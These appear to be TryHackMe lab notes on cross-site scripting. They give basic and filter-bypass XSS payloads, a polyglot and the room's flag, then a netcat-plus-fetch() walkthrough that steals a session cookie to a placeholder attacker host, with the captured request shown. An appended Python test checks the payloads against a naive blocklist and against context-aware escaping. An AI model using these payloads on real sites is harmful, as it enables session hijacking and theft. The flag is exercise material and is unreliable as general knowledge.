XSS

https://github.com/mandatoryprogrammer/xsshunter-express

Basic payloads

<script>alert('THM');</script>

"><script>alert('THM');</script>

</textarea><script>alert('THM');</script>

';alert('THM');//

When the filter removes the script tag (a single-pass removal leaves the inner tag intact).

<sscriptcript>alert('THM');</sscriptcript>

When < and > are filtered (break out of an existing attribute instead).

/images/cat.jpg" onload="alert('THM');"

Flag.

THM{XSS_MASTER}

XSS polyglot.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
1. Start a listener on the attacker machine (netcat is enough to catch the HTTP request):

    nc -nlvp 9001

2. Generate a payload:

    </textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>

3. Catch the cookie:

    root@ip-10-10-117-154:~# nc -nlvp 9001
    Listening on [0.0.0.0] (family 0, port 9001)
    Connection from 10.10.222.139 34142 received!
    GET /?cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ== HTTP/1.1
    Host: 10.10.117.154:9001
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.72 Safari/537.36
    Accept: */*
    Origin: http://172.17.0.1
    Referer: http://172.17.0.1/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US

4. Decode the base64 cookie:

    staff-session=4AB305E55955197693F01D6F8FD2D321
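As an added example (not from these notes or the TryHackMe room), the Python below feeds the payloads listed above through a single-pass "script" blocklist of the kind the nested tag defeats, then through context-aware output encoding for the three contexts the payloads target (HTML body, quoted attribute, JavaScript string), and checks that only the template's own tags survive. The `PAYLOADS` list, the templates and the `is_inert` check are constructed for this demonstration.

```python
import html
import json
import re

# Constructed test inputs: the payloads listed in the notes above.
PAYLOADS = [
    "<script>alert('THM');</script>",
    "\"><script>alert('THM');</script>",
    "</textarea><script>alert('THM');</script>",
    "';alert('THM');//",
    "<sscriptcript>alert('THM');</sscriptcript>",
    "/images/cat.jpg\" onload=\"alert('THM');\"",
]


def naive_filter(value: str) -> str:
    """Blocklist filter of the kind the notes bypass: drops 'script' in a single pass."""
    return value.replace("script", "")


def render_unsafe(value: str) -> str:
    """Weak version: trusts the blocklist and inserts the result into the page."""
    return "<p>" + naive_filter(value) + "</p>"


def render_html_body(value: str) -> str:
    """Text-node context: <, >, &, ' and " become entities, so no new tag can start."""
    return "<p>" + html.escape(value, quote=True) + "</p>"


def render_html_attribute(value: str) -> str:
    """Quoted-attribute context: same encoding, so a quote cannot end the attribute."""
    return '<img src="' + html.escape(value, quote=True) + '">'


def render_js_string(value: str) -> str:
    """JS-string context: JSON-quote the value, then hex-escape <, > and & so the
    HTML parser never sees a closing script tag inside the string."""
    quoted = json.dumps(value)
    quoted = quoted.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return "<script>var name = " + quoted + ";</script>"


def tags_in(rendered: str) -> tuple:
    """Tag-like tokens the HTML parser would see in the rendered output."""
    return tuple(re.findall(r"</?[A-Za-z]+", rendered))


def is_inert(rendered: str, template_tags: tuple) -> bool:
    """True when nothing but the template's own tags survived encoding."""
    return tags_in(rendered) == template_tags
```

Output encoding removes the injection itself; flagging the session cookie `HttpOnly` is a separate, complementary control that keeps `document.cookie` out of reach of any script that does run.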